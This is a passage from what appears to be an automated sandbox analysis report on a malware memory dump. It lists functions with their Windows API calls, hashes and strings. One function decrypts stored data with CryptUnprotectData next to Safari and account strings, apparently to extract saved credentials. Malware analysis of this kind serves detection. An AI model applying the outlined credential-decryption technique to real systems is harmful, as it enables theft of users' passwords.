                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                    • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                    • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                                                    • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18

                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                    Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                                                    • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3604893535-0
                                                                                                                                                                                    • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                    • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                                                                                    Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                    • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                    • API String ID: 2780580303-317687271
                                                                                                                                                                                    • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                    • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                    • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                                                    Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4218492932-0
                                                                                                                                                                                    • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                    • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                                                    Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                                                    • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1213725291-0
                                                                                                                                                                                    • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                                    • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                                                                                    • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                                                                                    Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                    • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                                    • free.MSVCRT ref: 00418370
                                                                                                                                                                                      • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                                                                      • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                                                    • String ID: OsError 0x%x (%u)
                                                                                                                                                                                    • API String ID: 2360000266-2664311388
                                                                                                                                                                                    • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                                                    • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                                                    Function 0041183A Relevance: 4.5, APIs: 3, Instructions: 44fileclipboardCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                    • OpenClipboard.USER32(?), ref: 00411878
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041188D
                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 004118AC
                                                                                                                                                                                      • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                      • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                      • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                      • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                      • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                      • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                      • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                      • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                      • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2633007058-0
                                                                                                                                                                                    • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                                                                                                    • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                                                                                                    • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                                                                                                                                                    Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1865533344-0
                                                                                                                                                                                    • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                                                                                                    • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                                                                                                    • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                                                                                                                                                    • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                                                                                                    Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Version
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1889659487-0
                                                                                                                                                                                    • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                                                    • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                                                                                                    • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                                                    • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                                                                                                    Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: NtdllProc_Window
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4255912815-0
                                                                                                                                                                                    • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                                    • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                                    • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                                                                                                    Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                    • memset.MSVCRT ref: 0040265F
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
                                                                                                                                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                      • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                                                                                                                                    • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                                    • API String ID: 2929817778-1134094380
                                                                                                                                                                                    • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                                                                                                    • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                                                    • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                                                    Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                                    • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                                    • API String ID: 2787044678-1921111777
                                                                                                                                                                                    • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                    • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                    • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                                                                    Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                                    • GetDC.USER32 ref: 004140E3
                                                                                                                                                                                    • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                                    • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                    • API String ID: 2080319088-3046471546
                                                                                                                                                                                    • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                    • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                    • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                                                    Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                                                    • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                                                    • memset.MSVCRT ref: 00413292
                                                                                                                                                                                    • memset.MSVCRT ref: 004132B4
                                                                                                                                                                                    • memset.MSVCRT ref: 004132CD
                                                                                                                                                                                    • memset.MSVCRT ref: 004132E1
                                                                                                                                                                                    • memset.MSVCRT ref: 004132FB
                                                                                                                                                                                    • memset.MSVCRT ref: 00413310
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                                                    • memset.MSVCRT ref: 004133C0
                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                                                    • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                                                    • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • {Unknown}, xrefs: 004132A6
                                                                                                                                                                                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                                    • API String ID: 4111938811-1819279800
                                                                                                                                                                                    • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                    • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                                                    • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                    • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                                                    Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
